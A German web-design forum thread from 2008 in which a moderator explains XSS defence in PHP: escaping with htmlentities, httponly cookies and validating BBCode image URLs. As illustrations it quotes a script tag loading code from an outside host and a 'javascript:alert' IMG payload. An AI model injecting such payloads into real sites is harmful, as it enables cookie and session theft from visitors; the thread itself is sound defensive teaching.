| Autor |
Nachricht |
m
Moderator
Dabei seit: 18.11.2004
Ort: -
Alter: -
Geschlecht: 
|
Verfasst Do 05.06.2008 14:30
Titel
|
  |
|
Damit hast du einen guten Überblick, irgendwo findest du dort auch einen Link zu einer PHP Funktion
zum Schutz vor XSS Attacken wenn ich mich nicht täusche. Welche Lücken in deiner Anwendung entstehen
können kann man so einfach nicht sagen. Achte darauf dass alle Werte von außen kommend die du in dein
Dokument integrierst "behandelt" werden, dass können sein z.B. Texte welche von Benutzer veröffentlicht
werden, z.B. ein Forum wie dieses, ich als Angreifer möchte testen ob eine Lücke besteht und verfasse
einen Eintrag (mal ein Beispiel von der von dir verlinkten Seite):
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
So, nichts passiert weil der String korrekt maskiert wird.
Wäre dass nicht der Fall, du würdest ihn also einfach ausgeben
| Code: | | echo '<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>'; |
So würde das Script ausgeführt.
Also maskiere die Sonderzeichen:
| Code: | | echo htmlentities('<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', ENT_QUOTES); |
Das wäre ein typisches Beispiel für Benutzereingaben welche z.B. über ein Formular in einer Datenbank
gespeichert werden und anschließend ausgegeben werden. Weiter in dem Fall, dieses Forum hier bietet die
Möglichkeit seine Beiträge per BBCode zu formatieren, dass kann weitere Lücken schaffen obwohl der String
zuvor schon maskiert wurde. Zum Beispiel beim Einsatz von [ IMG ] [ / IMG ] was eigentlich jedes Forum
bietet. Wenn nun ein Angreifer Javascript Code zwischen den Tags notiert, z.B. [ IMG ] javascript:alert('xss') [ / IMG ]
und nicht verhindert wird dass dieses in das src Attribut des img tags gelangt so entsteht die Möglichkeit dass ein
Nutzer je nachdem mit welchem Browser er die Seite besucht das Script ausführt, Internet Explorer 6 zum Beispiel.
Soweit ich weiß bestand diese Lücke sogar einmal in einer früheren PHPBB Version.
Eine Folge, man kommt an die Cookies des Benutzers. Für ein paar Browser gibt es die Möglichkeit ein Flag zu setzen
welches den Zugriff auf http Cookies per Javascript unmöglich macht.
| Code: | | ini_set("session.cookie_httponly", 1); |
Was nicht heißt du kannst über XSS Lücken hinwegsehen. Im Fall des IMG BBCodes heißt dass, validiere die URL
zur Grafik, überprüfe ob es sich um eine echte img resource handelt, oder gar biete keine Möglichkeit Grafiken
einzubinden sondern die Möglichkeit Grafiken auf dem Anbieter Server zu speichern und beim speicher Vorgang
zu überprüfen. Wichtige Aktionen wie z.B. dass ändern des Passwortes kann man zusätzlich absichern in dem man
vor der Aktion nach dem aktuellen Passwort verlangt u.ä.
Aber nicht nur direkte, von dir gewünschte, Benutzer Eingaben können schädlich sein. Ein Angreifer kann unerfahrenen
Nutzern manipulierte Links "unterjubeln", Session Fixation wäre ein weiteres Thema was die Sicherheit im Umgang mit
Session betrifft. CSRF Lücken, ein Nutzer führt durch manipulation von einer fremden Seite (oder einer eigens dafür
angelegten) Aktionen in deiner Anwendung durch, und und und...
Zuletzt bearbeitet von m am Do 05.06.2008 14:36, insgesamt 1-mal bearbeitet
|
|
| |
   |
 |
NDesign-88
Threadersteller
Dabei seit: 04.06.2008
Ort: -
Alter: -
Geschlecht: -
|
Verfasst Do 05.06.2008 16:48
Titel
|
|
|
Vielen Dank für deinen Beitrag 
Das hat mir zum Teil neue Problematiken Erklärt, denn z.B. die BBCodes zu Überprüfen, darüber habe ich bisher noch nicht nachgedacht ^^
auch wenn es nicht in dem Aktuellen Script Integriert ist, ist dies dennoch wichtig für andere Projekte
|
|
| |
|
|
|
Anzeige
|
|
|
m
Moderator
Dabei seit: 18.11.2004
Ort: -
Alter: -
Geschlecht:
|
Verfasst Do 05.06.2008 17:21
Titel
|
|
|
Das bezog sich jetzt auch nur auf deinen vorigen Beitrag. Zum aktuellen Fall lässt sich so leider
schwer was sagen da man einfach zu wenig weiß, wenn du genauer darauf eingehst um was für
eine Anwendung es geht dann kann man dazu vllt auch noch mehr sagen.
|
|
| |
|
|
Smooth-Graphics
Dabei seit: 22.05.2006
Ort: -
Alter: -
Geschlecht:
|
Verfasst Do 05.06.2008 17:39
Titel
|
|
|
Mal aktuell zum Thema PHP, XSS Sicherheit:
Wieso gibt es eigentlich derart wenig Informationen / Tutorials, in denen über Sicherheit in praktischen Anwendungsfällen geschrieben wird? Dann wären wahrscheinlich sehr viel mehr Seiten weniger anfällig gegen XSS und andere Lücken.
Ich würde gern eins schreiben, aber da fehlt mir dann doch das fundierte Fachwissen... 
Vielleicht könnte man ja hier mal einen Thread mit PHP Schnipseln aufmachen, die zur sicheren Entwicklung beitragen...
|
|
| |
|
|
m
Moderator
Dabei seit: 18.11.2004
Ort: -
Alter: -
Geschlecht:
|
Verfasst Do 05.06.2008 20:08
Titel
|
|
|
Es gibt schon ein paar Seiten im Netz (einfach mal googlen) welche sich speziell mit dem Thema
der Sicherheit in Webanwendungen beschäftigen und auch ein paar Bücher zu dem Thema da wirst
du bei Amazon sicher fündig.
|
|
| |
|
|
bacon
Dabei seit: 24.10.2007
Ort: -
Alter: -
Geschlecht: -
|
|
| |
|
|
| |
|
|
| Ähnliche Themen |
Sicherheit in Gästebuchscript
Excel-Sicherheit
Sicherheit von Sessions
script deaktivieren mit einem andere script?
Formularsystem mit "Sicherheit" und Überprüfung zB durch IP?
Action Script 2 oder Action Script 3
|
|
Willkommen auf dem Portal für Mediengestalter
